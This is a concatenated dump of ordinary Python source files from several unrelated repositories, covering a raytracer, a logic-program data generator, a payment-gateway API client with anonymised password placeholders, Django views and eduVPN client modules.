'nodes': nodes
}
}, upsert=True)
time.sleep(45)
def start(self):
if self.t is None:
self.t = start_new_thread(self.thread, ())
def stop(self):
self.stop_thread = True
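# Usage sketch: snapshot the daily node counts shortly after midnight.
#   job = DailyActiveNodes(hour=0, minute=5)
#   job.start()
#   ...
#   job.stop()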
```
#### File: sentinel/utils/middlewares.py
```python
import json
class JSONTranslator(object):
def process_request(self, req, resp):
body = req.stream.read()
try:
req.body = json.loads(body.decode('utf-8'))
except ValueError:
_ = {
'message': 'Malformed JSON',
'errors': ['JSON was incorrect or not encoded as UTF-8.']
}
``` |
{
"source": "14bmkelley/raytracer-python",
"score": 3
} |
#### File: 14bmkelley/raytracer-python/collisions.py
```python
import math
from vector_math import *
def sphere_intersection_point(ray, sphere):
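    # Substitute the ray p(t) = pt + t*dir into the sphere equation
    # |p - center|^2 = radius^2 and collect terms into A*t^2 + B*t + C = 0.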
origin_diff = difference_point(ray.pt, sphere.center)
A = dot_vector(ray.dir, ray.dir)
B = dot_vector(scale_vector(origin_diff, 2), ray.dir)
C = dot_vector(origin_diff, origin_diff) - sphere.radius ** 2
determinant = B ** 2 - 4 * A * C
def get_point_from_root(t):
return translate_point(ray.pt, scale_vector(ray.dir, t))
if determinant >= 0:
root1 = (-B + math.sqrt(determinant)) / (2.0 * A)
root2 = (-B - math.sqrt(determinant)) / (2.0 * A)
if root1 >= 0 and root2 >= 0:
if root1 == root2:
return get_point_from_root(root1)
else:
if root1 < root2:
return get_point_from_root(root1)
else:
return get_point_from_root(root2)
elif root1 >= 0 or root2 >= 0:
if root1 >= 0:
return get_point_from_root(root1)
else:
return get_point_from_root(root2)
else:
return None
else:
return None
def find_intersection_points(sphere_list, ray):
    # Compute each intersection once and keep only the spheres actually hit
    intersections = [(sphere, sphere_intersection_point(ray, sphere)) for sphere in sphere_list]
    return [(sphere, point) for sphere, point in intersections if point is not None]
def sphere_normal_at_point(sphere, point):
return normalize_vector(vector_from_to(sphere.center, point))
```
#### File: 14bmkelley/raytracer-python/ray_caster.py
```python
from sys import argv, stdout
from data import Point, Color, Finish, Sphere
from commandline import get_eye_point, get_view, get_light, get_ambient
from cast import cast_all_rays
def main():
sphere_list = []
#try to open file or throw error
try:
input_file = open(argv[1], "r")
except:
print "Error: Filename not correctly specified"
print "Usage: python ray_caster.py # [-eye x y z] [-view min_x max_x min_y max_y width height"
exit()
#try to instantiate spheres from argv inputs or throw error
line_count = 0
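    # Each input line describes one sphere:
    #   x y z radius r g b ambient diffuse specular roughness
    # e.g. "0.0 0.0 5.0 1.0 1.0 0.0 0.0 0.2 0.4 0.5 0.05" (hypothetical values)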
for line in input_file:
line_count += 1
try:
params = line.split()
x = float(params[0])
y = float(params[1])
z = float(params[2])
rad = float(params[3])
r = float(params[4])
g = float(params[5])
b = float(params[6])
amb = float(params[7])
diff = float(params[8])
spec = float(params[9])
rough = float(params[10])
sphere = Sphere(Point(x, y, z), rad, Color(r, g, b), Finish(amb, diff, spec, rough))
sphere_list.append(sphere)
except:
print "malformed sphere on line {0} ... skipping".format(str(line_count))
#initialize casting variables relative to argv inputs
eye_point = get_eye_point(argv)
view = get_view(argv)
light = get_light(argv)
ambient = get_ambient(argv)
#write to image.ppm output image
file = open("image.ppm", "w")
file.write("P3\n")
file.write("{0} {1}\n".format(str(view.width), str(view.height)))
file.write("{0}\n".format(str(255)))
cast_all_rays(view, eye_point, sphere_list, ambient, light, file)
file.close()
if __name__ == "__main__":
main()
``` |
{
"source": "14es93/shellfunction",
"score": 3
} |
#### File: shellfunction/tests/test_core.py
```python
import shellfuncs
def test_basic_import():
"""
Test basic import functionality
"""
from .input_scripts.foo import bar
returncode, stdout, stderr = bar('STDOUT', 'STDERR')
assert returncode == 0
assert stdout == b'STDOUT\n'
assert stderr == b'STDERR\n'
def test_shell_config():
"""
Test configuring shell
"""
with shellfuncs.config(shell='/bin/bash'):
from .input_scripts.config import used_shell
_, stdout, _ = used_shell()
assert stdout == b'/bin/bash\n'
_, stdout, _ = used_shell(shell='/bin/sh')
assert stdout == b'/bin/sh\n'
``` |
{
"source": "14gaby14/sharedgames",
"score": 2
} |
#### File: website/sharedgames/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
def index(request):
return HttpResponse("This should be the shared games index.")
def detail(request, group_id):
return HttpResponse("The code is %s." % group_id)
def example(request):
return HttpResponse("This is an example")
``` |
{
"source": "14gollaher/Tango-Release",
"score": 3
} |
#### File: tango/TangoComponents/TangoRepository.py
```python
import os
import json
from TangoUserApplication import *
class TangoRepository:
def __init__(self):
self.directory = os.path.dirname(__file__)
self.filePath = os.path.join(self.directory, 'tango-pages.json')
def upsert_tango_pages(self, new_tango_pages):
with open(self.filePath, 'w') as filePath:
json.dump(new_tango_pages, filePath)
def upsert_tango_page(self, new_tango_page):
tango_pages = self.get_tango_pages()
page_exists = False
for i in range(len(tango_pages)):
if tango_pages[i]['view_name'] == new_tango_page['view_name']:
tango_pages[i] = new_tango_page
page_exists = True
if not page_exists: tango_pages.append(new_tango_page)
self.upsert_tango_pages(tango_pages)
def get_tango_pages(self):
with open(self.filePath, 'r') as filePath:
return json.load(filePath)
def get_tango_page(self, view_name):
for tango_page in self.get_tango_pages():
if tango_page['view_name'] == view_name: return tango_page
tango_page = {}
tango_page['view_name'] = view_name
tango_page['cases'] = []
tangoUserApplication = TangoUserApplication()
tango_page['fields'] = tangoUserApplication.get_fields(view_name)
return tango_page
def update_field_selector(self, view_name, field_name, new_selector):
        tango_page = self.get_tango_page(view_name)
        fields = tango_page['fields']
        for field in fields:
            if field['name'] == field_name: field['selector'] = new_selector
        tango_page['fields'] = fields
        self.upsert_tango_page(tango_page)
``` |
{
"source": "14H034160212/deeplogic",
"score": 3
} |
#### File: 14H034160212/deeplogic/gen_logic.py
```python
import argparse
import random as R
# Symbol Pool
CONST_SYMBOLS = "abcdefghijklmnopqrstuvwxyz"
VAR_SYMBOLS = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
PRED_SYMBOLS = "abcdefghijklmnopqrstuvwxyz"
EXTRA_SYMBOLS = "-,()"
CHARS = sorted(list(set(CONST_SYMBOLS+VAR_SYMBOLS+PRED_SYMBOLS+EXTRA_SYMBOLS)))
# Reserve 0 for padding
CHAR_IDX = dict((c, i+1) for i, c in enumerate(CHARS))
IDX_CHAR = [0]
IDX_CHAR.extend(CHARS)
# Predicate Templates
FACT_T = "{}."
RULE_T = "{}:-{}."
PRED_T = "{}({})"
ARG_SEP = ','
PRED_SEP = ';'
NEG_PREFIX = '-'
TARGET_T = "? {} {}"
# pylint: disable=line-too-long,too-many-arguments,too-many-statements
def r_string(symbols, length):
"""Return random sequence from given symbols."""
return ''.join(R.choice(symbols)
for _ in range(length))
def r_symbols(size, symbols, length, used=None):
"""Return unique random from given symbols."""
if length == 1 and not used:
return R.sample(symbols, size)
rset, used = set(), set(used or [])
while len(rset) < size:
s = r_string(symbols, R.randint(1, length))
if s not in used:
rset.add(s)
return list(rset)
def r_consts(size, used=None):
"""Return size many unique constants."""
return r_symbols(size, CONST_SYMBOLS, ARGS.constant_length, used)
def r_vars(size, used=None):
"""Return size many unique variables."""
return r_symbols(size, VAR_SYMBOLS, ARGS.variable_length, used)
def r_preds(size, used=None):
"""Return size many unique predicates."""
return r_symbols(size, PRED_SYMBOLS, ARGS.predicate_length, used)
def write_p(pred):
"""Format single predicate tuple into string."""
return PRED_T.format(pred[0], ARG_SEP.join(pred[1:]))
def write_r(preds):
"""Convert rule predicate tuple into string."""
head = write_p(preds[0])
# Is it just a fact
if len(preds) == 1:
return FACT_T.format(head)
# We have a rule
return RULE_T.format(head, PRED_SEP.join([write_p(p) for p in preds[1:]]))
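# For reference: write_r([('p', 'a', 'b')]) gives "p(a,b)." and
# write_r([('q', 'X'), ('p', 'X', 'Y')]) gives "q(X):-p(X,Y)."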
def output(context, targets):
"""Print the context and given targets."""
# context: [[('p', 'a', 'b')], ...]
# targets: [(('p', 'a', 'b'), 1), ...]
if ARGS.shuffle_context:
R.shuffle(context)
print('\n'.join([write_r(c) for c in context]))
for t, v in targets:
print(TARGET_T.format(write_r([t]), v))
def cv_mismatch(consts):
"""Returns a possible mismatching variable binding for given constants."""
if len(consts) <= 1 or len(set(consts)) == 1:
return list()
# We know some constant is different
# [a,b,a,c] -> [X,Y,Y,Z]
# [a,b] -> [X,X] are mismatches
# assign same variables to different constants
vs = r_vars(len(consts)-1) # [X,Y,Z,..]
for i, c in enumerate(consts[1:]):
if c != consts[0]:
# we haven't seen it before
vs.insert(i+1,vs[0])
break
assert len(vs) == len(consts)
return vs
def cv_match(consts):
"""Returns a possible matching variable binding for given constants."""
if len(consts) <= 1:
return r_vars(len(consts))
    # We want to *randomly* assign the same variable to the same constants
# [a,a,b] -> [X,Y,Z] -> [X,X,Y]
vs = r_vars(len(consts))
cvmap = dict()
for i, c in enumerate(consts):
if c in cvmap:
if R.random() < 0.5:
vs[i] = cvmap[c] # assign the same variable
# otherwise get a unique variable
else:
cvmap[c] = vs[i]
assert len(vs) == len(consts)
return vs
def generate(depth=0, context=None, target=None, success=None,
upreds=None, uconsts=None, stats=None):
"""Generate tree based logic program."""
ctx = context or list()
args = target[1:] if target else [r_consts(1)[0] for _ in range(ARGS.arity)]
t = target or [r_preds(1)[0]] + [R.choice(args) for _ in range(R.randint(1, ARGS.arity))]
arity = len(t[1:])
succ = success if success is not None else R.choice((True, False))
upreds = upreds or set([t[0]])
uconsts = uconsts or set(t[1:])
stats = stats or dict()
# Create rule OR branching
num_rules = R.randint(1, ARGS.max_or_branch)
stats.setdefault('or_num', list()).append(num_rules)
    # If the rule succeeds then at least one branch must succeed
succs = [R.choice((True, False)) for _ in range(num_rules)] \
if succ else [False]*num_rules # otherwise all branches must fail
if succ and not any(succs):
# Ensure at least one OR branch succeeds
succs[R.randrange(len(succs))] = True
# Rule depths randomised between 0 to max depth
depths = [R.randint(0, depth) for _ in range(num_rules)]
if max(depths) != depth:
depths[R.randrange(num_rules)] = depth
# print("HERE:", num_rules, succs, depths, t)
# Generate OR branches
is_tadded = False
for child_depth, child_succ in zip(depths, succs):
# Base case
if child_depth == 0:
if R.random() < 0.20:
# The constant doesn't match
args = t[1:]
args[R.randrange(len(args))] = r_consts(1, uconsts)[0]
uconsts.update(args)
ctx.append([[t[0]] + args])
if R.random() < 0.20:
# The predicate doesn't match
p = r_preds(1, upreds)[0]
upreds.add(p)
ctx.append([[p,] + t[1:]])
if R.random() < 0.20:
# The arity doesn't match
ctx.append([[t[0]] + t[1:] + [R.choice(t[1:] + r_consts(arity))]])
if R.random() < 0.20:
# The variables don't match
vs = cv_mismatch(t[1:])
if vs:
ctx.append([[t[0]] + vs])
# The predicate doesn't appear at all
if child_succ:
if R.random() < 0.5:
# p(X). case
ctx.append([[t[0]] + cv_match(t[1:])])
elif not is_tadded:
# ground case
ctx.append([t])
is_tadded = True
continue
# Recursive case
num_body = R.randint(1, ARGS.max_and_branch)
stats.setdefault('body_num', list()).append(num_body)
negation = [R.choice((True, False)) for _ in range(num_body)] \
if ARGS.negation else [False]*num_body
# Compute recursive success targets
succ_targets = [R.choice((True, False)) for _ in range(num_body)] \
if not child_succ else [not n for n in negation]
if not child_succ:
# Ensure a failed target
ri = R.randrange(len(succ_targets))
# succeeding negation fails this, vice versa
succ_targets[ri] = negation[ri]
# Create rule
body_preds = r_preds(num_body, upreds)
upreds.update(body_preds)
lit_vars = cv_match(t[1:])
if not child_succ and R.random() < 0.5:
# Fail due to variable pattern mismatch
vs = cv_mismatch(t[1:])
if vs:
lit_vars = vs
succ_targets = [R.choice((True, False)) for _ in range(num_body)]
lit_vars.extend([r_vars(1)[0] for _ in range(ARGS.unbound_vars)])
rule = [[t[0]]+lit_vars[:arity]]
vcmap = {lit_vars[i]:t[i+1] for i in range(arity)}
# Compute child targets
child_targets = list()
for i in range(num_body):
R.shuffle(lit_vars)
child_arity = R.randint(1, arity)
pred = [body_preds[i]] + lit_vars[:child_arity]
rule.append([(NEG_PREFIX if negation[i] else "") + pred[0]] + pred[1:])
vs = [vcmap.get(v, r_consts(1, uconsts)[0]) for v in lit_vars[:child_arity]]
child_targets.append([pred[0]]+vs)
ctx.append(rule)
# Recurse
for child_t, s in zip(child_targets, succ_targets):
generate(child_depth-1, ctx, child_t, s, upreds, uconsts, stats)
return ctx, [(t, int(succ))], stats
if __name__ == '__main__':
# Arguments
parser = argparse.ArgumentParser(description="Generate logic program data.")
parser.add_argument("-d", "--depth", default=0, type=int, help="The depth of the logic program.")
parser.add_argument("-mob", "--max_or_branch", default=1, type=int, help="Upper bound on number of branches.")
parser.add_argument("-mab", "--max_and_branch", default=1, type=int, help="Upper bound on number of branches.")
parser.add_argument("-s", "--size", default=1, type=int, help="Number of programs to generate.")
# Configuration parameters
parser.add_argument("-uv", "--unbound_vars", default=0, type=int, help="Number of unbound variables.")
parser.add_argument("-ar", "--arity", default=2, type=int, help="Upper bound on arity of literals.")
parser.add_argument("-n", "--negation", action="store_true", help="Use negation by failure.")
parser.add_argument("-cl", "--constant_length", default=2, type=int, help="Length of constants.")
parser.add_argument("-vl", "--variable_length", default=1, type=int, help="Length of variables.")
parser.add_argument("-pl", "--predicate_length", default=2, type=int, help="Length of predicates.")
parser.add_argument("-sf", "--shuffle_context", action="store_true", help="Shuffle context before output.")
ARGS = parser.parse_args()
for _ in range(ARGS.size):
context_out, targets_out, _ = generate(depth=ARGS.depth)
output(context_out, targets_out)
```
#### File: deeplogic/models/__init__.py
```python
import importlib
def build_model(model_name, weights_file=None, **kwargs):
"""Build the desired model."""
mod = importlib.import_module("."+model_name, __name__)
model = mod.build_model(**kwargs)
if weights_file:
try:
model.load_weights(weights_file, by_name=True)
print("Loaded existing model:", weights_file)
except Exception as e: # pylint: disable=broad-except
print("Error loading model:", e)
return model
``` |
{
"source": "14MR/flask_uniteller",
"score": 2
} |
#### File: flask_uniteller/libs/uniteller_api.py
```python
import hashlib
import string
import csv
from console import app
from grab import Grab
from lxml import etree
class UnitellerApi(object):
CODE_SUCCESS = 'AS000'
STATUS_COMPLETE = 'Paid'
STATUS_AUTH = 'Authorized'
STATUS_CANCELED = 'Canceled'
SUCCESS_NO = 0
SUCCESS_YES = 1
SUCCESS_ALL = 2
EMPTY_ORDER = dict(
order_id='',
amount='',
mean_type='',
money_type='',
life_time='',
customer_id='',
card_id='',
l_data='',
paymen_type='',
)
def __init__(self, const):
self.const = const
self.grab = None
self.order_id = None
self.success = self.SUCCESS_ALL
self.shop_id = self.const.SHOP_ID
self.password = <PASSWORD>
self.login = self.const.LOGIN
self.prefix = self.const.TEST and self.const.TEST_PREFIX or self.const.DEFAULT_PREFIX
def __repr__(self):
return "%s" % self.const
def get_url(self, method):
return "%s%s/%s/" % (self.prefix, self.const.GENERAL_URL, method)
def get_sing(self, order):
result = [hashlib.md5(str(value)).hexdigest() for value in order]
return string.upper(hashlib.md5(str('&'.join(result))).hexdigest())
def get_reccurent_sing(self, order):
"""Обязательные данные - order_id, amount, parent_order_id"""
data = (
self.shop_id,
order['order_id'],
order['amount'],
order['parent_order_id'],
self.password
)
return self.get_sing(data)
def get_payment_sing(self, order):
full_order = dict(self.EMPTY_ORDER, **order)
data = (
self.shop_id,
full_order['order_id'],
full_order['amount'],
full_order['mean_type'],
full_order['money_type'],
full_order['life_time'],
full_order['customer_id'],
full_order['card_id'],
full_order['l_data'],
full_order['paymen_type'],
self.password
)
return self.get_sing(data)
def set_request(self, url, data=None):
return_data = False
if not self.grab:
self.grab = Grab()
if data:
self.grab.setup(post=data)
try:
self.grab.go(url)
except Exception as e:
app.logger.error(e)
else:
return_data = self.grab
return return_data
def get_payment_info(self, order_id=None):
return_data = False
keys = (
'ordernumber',
'response_code',
'total',
'currency',
'date',
'billnumber',
'status',
'cardnumber',
'phone',
'ipaddress',
)
data = dict(
Shop_ID=self.shop_id,
Login=self.login,
Password=<PASSWORD>,
Format=4,
Success=self.success
)
if order_id:
data['ShopOrderNumber'] = order_id
result = self.set_request(self.get_url('results'), data)
if result:
try:
tree = etree.fromstring(result.response.body)
except Exception as e:
app.logger.error(e)
app.logger.error(result.response.body)
else:
event_nodes = tree.xpath(
'/unitellerresult/orders/order')
return_data = {}
for event_node in event_nodes:
data = {}
for key in keys:
data[key] = event_node.find(key).text
if 'ordernumber' in data:
return_data[data['ordernumber']] = data
return return_data
def reccurent_payment(self, order):
"""Обязательные данные - order_id, amount, parent_order_id"""
return_data = False
data = dict(
Shop_IDP=self.shop_id,
Order_IDP=order['order_id'],
Subtotal_P=order['amount'],
Parent_Order_IDP=order['parent_order_id'],
Signature=self.get_reccurent_sing(order)
)
result = self.set_request(self.get_url('recurrent'), data)
if result:
data = result.response.body
reader = csv.reader(data.split('\n'), delimiter=';')
response_code = None
for row in reader:
if len(row) > 1:
response_code = row[1]
return_data = response_code
return return_data
def _request(self, order_id, method):
return_data = False
info = self.get_payment_info(order_id)
if info:
data = dict(
Billnumber=info[str(order_id)]['billnumber'],
Shop_ID=self.shop_id,
Login=self.login,
Password=<PASSWORD>,
)
result = self.set_request(self.get_url(method), data)
if result:
data = result.response.body
reader = csv.DictReader(data.split('\n'), delimiter=';')
                if 'ErrorCode' not in reader.fieldnames:
return_data = True
return return_data
def unblock_payment(self, order_id):
return self._request(order_id, 'unblock')
def confirm_payment(self, order_id):
return self._request(order_id, 'confirm')
``` |
{
"source": "14mRh4X0r/python-eduvpn-client",
"score": 3
} |
#### File: python-eduvpn-client/eduvpn/menu.py
```python
from logging import getLogger
from argparse import Namespace
from itertools import chain
from pathlib import Path
from sys import exit
from typing import List, Dict, Optional, Tuple, Any
from eduvpn.i18n import extract_translation
from eduvpn.nm import nm_available, save_connection_with_mainloop
from eduvpn.remote import list_servers, list_organisations
from eduvpn.settings import SERVER_URI, ORGANISATION_URI
from eduvpn.storage import write_config
_logger = getLogger()
ServerListType = List[Dict[str, Any]]
def fetch_servers_orgs() -> Tuple[ServerListType, ServerListType]:
servers = list_servers(SERVER_URI)
orgs = list_organisations(ORGANISATION_URI)
return servers, orgs
def input_int(max_: int):
"""
Request the user to enter a number.
"""
while True:
choice = input("\n> ")
if choice.isdigit() and int(choice) < max_:
break
else:
print("error: invalid choice")
return int(choice)
def provider_choice(institutes: List[dict], orgs: List[dict]) -> Tuple[str, str, Optional[str], bool]:
"""
Ask the user to make a choice from a list of institute and secure internet providers.
returns:
url, display_name, contact, bool. Bool indicates if it is secure_internet or not.
"""
print("\nPlease choose server:\n")
print("Institute access:")
for i, row in enumerate(institutes):
print(f"[{i}] {extract_translation(row['display_name'])}")
print("Secure internet: \n")
for i, row in enumerate(orgs, start=len(institutes)):
print(f"[{i}] {extract_translation(row['display_name'])}")
choice = input_int(max_=len(institutes) + len(orgs))
if choice < len(institutes):
institute = institutes[choice]
return institute['base_url'], extract_translation(institute['display_name']), institute[
'support_contact'], False
else:
org = orgs[choice - len(institutes)]
return org['secure_internet_home'], extract_translation(org['display_name']), None, True
def menu(
institutes: List[dict],
orgs: List[dict],
search_term: Optional[str] = None
) -> Tuple[str, str, Optional[str], bool]:
"""
returns:
        url, display_name, contact, bool. Bool indicates if it is secure_internet or not.
"""
# todo: add initial search filtering
return provider_choice(institutes, orgs)
def profile_choice(profiles: List[Dict]) -> str:
"""
If multiple profiles are available, present user with choice which profile.
"""
if len(profiles) > 1:
print("\nplease choose a profile:\n")
for i, profile in enumerate(profiles):
print(f" * [{i}] {profile['display_name']}")
choice = input_int(max_=len(profiles))
return profiles[int(choice)]['profile_id']
else:
return profiles[0]['profile_id']
def write_to_nm_choice() -> bool:
"""
When Network Manager is available, asks user to add VPN to Network Manager
"""
print("\nWhat would you like to do with your VPN configuration:\n")
print("* [0] Write .ovpn file to current directory")
print("* [1] Add VPN configuration to Network Manager")
return bool(input_int(max_=2))
def secure_internet_choice(secure_internets: List[dict]) -> Optional[Tuple[str, str]]:
print("Do you want to select a secure internet location? If not we use the default.")
while True:
choice = input("\n[N/y] > ").strip().lower()
if choice == 'n' or not choice:
return None
elif choice == 'y':
print("\nplease choose a secure internet server:\n")
for i, profile in enumerate(secure_internets):
print(f" * [{i}] {extract_translation(profile['country_code'])}")
choice = input_int(max_=len(secure_internets))
base_url = secure_internets[int(choice)]['base_url']
country_code = secure_internets[int(choice)]['country_code']
return base_url, country_code
else:
print("error: invalid choice, please enter y, n or just leave empty")
def search(args: Namespace):
search_term = args.match
servers, orgs = fetch_servers_orgs()
institute_matches, org_matches = match_term(servers, orgs, search_term)
print(f"Your search term '{search_term}' matched with the following institutes/organisations:\n")
if len(institute_matches):
print("Institute access:")
for i, row in institute_matches:
print(f"[{i}] {extract_translation(row['display_name'])}")
if len(org_matches):
print("\nSecure internet: \n")
for i, row in org_matches:
print(f"[{i}] {extract_translation(row['display_name'])}")
def configure(args: Namespace) -> Tuple[str, str, Optional[str], Optional[ServerListType]]:
search_term = args.match
servers, orgs = fetch_servers_orgs()
secure_internets = [s for s in servers if s['server_type'] == 'secure_internet']
institute_matches, org_matches = match_term(servers, orgs, search_term, exact=True)
if isinstance(search_term, str) and search_term.lower().startswith('https://'):
return search_term, search_term, None, None
else:
if len(institute_matches) == 0 and len(org_matches) == 0:
print(f"The filter '{search_term}' had no matches")
exit(1)
elif len(institute_matches) == 1 and len(org_matches) == 0:
index, institute = institute_matches[0]
print(f"filter '{search_term}' matched with institute '{institute['display_name']}'")
return institute['base_url'], extract_translation(institute['display_name']), institute[
'support_contact'], None
elif len(institute_matches) == 0 and len(org_matches) == 1:
index, org = org_matches[0]
print(f"filter '{search_term}' matched with organisation '{org['display_name']}'")
return org['secure_internet_home'], extract_translation(org['display_name']), None, secure_internets
else:
matches = [i[1]['display_name'] for i in chain(institute_matches, org_matches)]
print(
f"filter '{search_term}' matched with {len(matches)} institutes and organisations, please be more specific.")
print("Matches:")
for m in matches:
print(f" - {extract_translation(m)}")
exit(1)
def interactive(args: Namespace) -> Tuple[str, str, Optional[str], Optional[ServerListType]]:
"""
returns:
auth_url, display_name, support_contact, secure_internets
"""
search_term = args.match
if isinstance(search_term, str) and search_term.lower().startswith('https://'):
return search_term, search_term, None, None
servers = list_servers(SERVER_URI)
secure_internets = [s for s in servers if s['server_type'] == 'secure_internet']
institute_access = [s for s in servers if s['server_type'] == 'institute_access']
orgs = list_organisations(ORGANISATION_URI)
choice = menu(institutes=institute_access, orgs=orgs, search_term=search_term)
if not choice:
exit(1)
auth_url, display_name, support_contact, secure_internet = choice
if not secure_internet:
return auth_url, display_name, support_contact, None
return auth_url, display_name, support_contact, secure_internets
def match_term(
servers: ServerListType,
orgs: ServerListType,
search_term: Optional[str], exact=False
) -> Tuple[List[Tuple[int, Dict[str, Any]]], List[Tuple[int, Dict[str, Any]]]]:
"""
Search the list of institutes and organisations for a string match.
    returns:
        (institute_matches, org_matches): two lists of (index, entry) tuples
"""
institute_access = [s for s in servers if s['server_type'] == 'institute_access']
if not search_term:
return list(enumerate(institute_access)), list(enumerate(orgs, len(institute_access)))
institute_matches: List[Tuple[int, Dict[str, Any]]] = []
for x, i in enumerate(institute_access):
if not exact:
if search_term.lower() in extract_translation(i['display_name']).lower():
institute_matches.append((x, i))
if exact:
if search_term.lower() == extract_translation(i['display_name']).lower():
institute_matches.append((x, i))
org_matches: List[Tuple[int, Dict[str, Any]]] = []
for x, i in enumerate(orgs, len(institute_access)):
if not exact:
if search_term.lower() in extract_translation(i['display_name']).lower() \
or 'keyword_list' in i and search_term in i['keyword_list']:
org_matches.append((x, i))
if exact:
if search_term.lower() == extract_translation(i['display_name']).lower():
org_matches.append((x, i))
return institute_matches, org_matches
def store_configuration(config, private_key, certificate, interactive=False):
target = Path('eduVPN.ovpn').resolve()
if interactive and nm_available():
if write_to_nm_choice():
save_connection_with_mainloop(config, private_key, certificate)
else:
write_config(config, private_key, certificate, target)
else:
if nm_available():
save_connection_with_mainloop(config, private_key, certificate)
else:
write_config(config, private_key, certificate, target)
```
#### File: python-eduvpn-client/eduvpn/state_machine.py
```python
from typing import (
TypeVar, Generic, Any, Union, Optional, Callable,
Type, Iterable, Tuple, Dict, Set)
import enum
class TransitionEdge(enum.Enum):
"""
The edge of a state lifetime.
The edge is `enter` when the state starts,
and `exit` when it ends.
"""
enter = enum.auto()
exit = enum.auto()
ENTER = TransitionEdge.enter
EXIT = TransitionEdge.exit
# typing aliases
State = TypeVar('State')
StateType = Type[State]
Callback = Callable[[State, State], None]
StateTargets = Union[StateType, Iterable[StateType]]
CallbackRegistry = Dict[
Optional[Tuple[StateType, TransitionEdge]],
Set[Callback]]
TRANSITION_CALLBACK_MARKER = '__transition_callback_for_state'
def setattr_list_item(obj, attr, item):
try:
list_attr = getattr(obj, attr)
except AttributeError:
list_attr = []
setattr(obj, attr, list_attr)
list_attr.append(item)
def transition_callback(state_targets: StateTargets):
"""
Decorator factory to mark a method as a
transition callback for all transitions.
Note the argument is the base class for states of the state machine
to register transition events of.
Without this, there would be no way to know which
state machine this callback targets.
"""
if not isinstance(state_targets, tuple):
# Normalise argument to tuple.
state_targets = (state_targets, ) # type: ignore
def decorator(func: Callback):
for state_type in state_targets:
setattr_list_item(func,
TRANSITION_CALLBACK_MARKER,
(None, state_type))
return func
return decorator
def transition_edge_callback(edge: TransitionEdge,
state_targets: StateTargets):
"""
Decorator factory to mark a method as a transition callback
for specific state transition edges.
"""
if not isinstance(state_targets, tuple):
# Normalise argument to tuple.
state_targets = (state_targets, ) # type: ignore
def decorator(func: Callback):
for state_type in state_targets:
setattr_list_item(func,
TRANSITION_CALLBACK_MARKER,
(edge, state_type))
return func
return decorator
def _find_transition_callbacks(obj: Any, base_state_type: Type[State]):
for attr in dir(obj):
callback = getattr(obj, attr)
try:
registrations = getattr(callback, TRANSITION_CALLBACK_MARKER)
except AttributeError:
pass
else:
for edge, state_type in registrations:
if issubclass(state_type, base_state_type):
yield callback, edge, state_type
class InvalidStateTransition(Exception):
def __init__(self, name: str):
self.name = name
class StateMachine(Generic[State]):
"""
State machine wrapper that allows registering transition callbacks.
"""
def __init__(self, initial_state: State):
self._state = initial_state
self._callbacks: CallbackRegistry = {}
@property
def state(self) -> State:
"""
Obtain the current state.
The state can be changed by calling `transition()`
with the name of a transition of the current state.
"""
# The state is behind a property to prevent setting it directly.
return self._state
def transition(self, transition: str, *args, **kwargs):
"""
Transition to a new state.
This method is *not* thread-safe,
all calls should be made from the same thread.
"""
old_state = self._state
try:
transition_func = getattr(old_state, transition)
except AttributeError as e:
raise InvalidStateTransition(transition) from e
new_state = transition_func(*args, **kwargs)
self._call_edge_callbacks(EXIT, old_state, new_state)
self._state = new_state
self._call_generic_callbacks(old_state, new_state)
self._call_edge_callbacks(ENTER, old_state, new_state)
return new_state
def register_generic_callback(self, callback: Callback):
"""
Register a callback for all transitions.
"""
self._callbacks.setdefault(None, set()).add(callback)
def register_edge_callback(self,
state_type: Type[State],
edge: TransitionEdge,
callback: Callback):
"""
Register a callback for specific transition edges.
"""
self._callbacks.setdefault((state_type, edge), set()).add(callback)
def connect_object_callbacks(self, obj, base_state_type: Type[State]):
"""
Register all state transition callback methods decorated with
`@transition_callback()` and `@transition_edge_callback()`
of an object.
Provide the base class of states for this state machine
as the second argument to filter registrations for this
state machine only.
Only method registered to a subclass of this base class
will be connected.
"""
iterator = _find_transition_callbacks(obj, base_state_type)
for callback, edge, state_type in iterator:
if edge is None:
# This callback targets all events.
self.register_generic_callback(callback)
else:
# This callback targets a specific state edge.
self.register_edge_callback(state_type, edge, callback)
def _call_generic_callbacks(self, old_state: State, new_state: State):
for callback in self._callbacks.get(None, []):
callback(old_state, new_state)
def _call_edge_callbacks(self,
edge: TransitionEdge,
old_state: State,
new_state: State):
state = new_state if edge is ENTER else old_state
for callback in self._callbacks.get((state.__class__, edge), []):
callback(old_state, new_state)
class BaseState:
"""
Base class for all state machine states.
"""
def __repr__(self):
fields = ','.join(f' {k}={v!r}' for k, v in self.__dict__.items())
return f'<{self.__class__.__name__}{fields}>'
def has_transition(self, name: str) -> bool:
"""
Return True if this state defines the transition function.
"""
return hasattr(self, name)
def copy(self, **fields):
"""
Return a copy of this state, with some fields altered.
"""
return self.__class__(**{**self.__dict__, **fields})
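# Illustrative usage sketch (the Off/On state classes are hypothetical and only
# show how transitions and edge callbacks fit together):
#
#   class Off(BaseState):
#       def turn_on(self):
#           return On()
#
#   class On(BaseState):
#       def turn_off(self):
#           return Off()
#
#   machine = StateMachine(Off())
#   machine.register_edge_callback(On, ENTER, lambda old, new: print('entered', new))
#   machine.transition('turn_on')  # fires the callback with (Off instance, On instance)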
```
#### File: eduvpn/ui/utils.py
```python
from eduvpn.utils import logger
import gi
gi.require_version('Gtk', '3.0') # noqa: E402
from gi.repository import Gtk, GObject
# ui thread
def error_helper(parent: GObject, # type: ignore
msg_big: str,
msg_small: str) -> None:
"""
Shows a GTK error message dialog.
args:
parent (GObject): A GTK Window
msg_big (str): the big string
msg_small (str): the small string
"""
logger.error(f"{msg_big}: {msg_small}")
error_dialog = Gtk.MessageDialog( # type: ignore
parent,
0,
Gtk.MessageType.ERROR, # type: ignore
Gtk.ButtonsType.OK, # type: ignore
str(msg_big),
)
error_dialog.format_secondary_text(str(msg_small)) # type: ignore
error_dialog.run() # type: ignore
error_dialog.hide() # type: ignore
def show_ui_component(builder, component: str, show: bool):
"""
Set the visibility of a UI component.
"""
component = builder.get_object(component)
if show:
component.show() # type: ignore
else:
component.hide() # type: ignore
def link_markup(link: str) -> str:
try:
scheme, rest = link.split(':', 1)
if rest.startswith('//'):
rest = rest[2:]
except ValueError:
return link
else:
return f'<a href="{link}">{rest}</a>'
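# e.g. link_markup('https://example.org') -> '<a href="https://example.org">example.org</a>'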
```
#### File: python-eduvpn-client/tests/test_flow.py
```python
from unittest import TestCase
from unittest.mock import patch
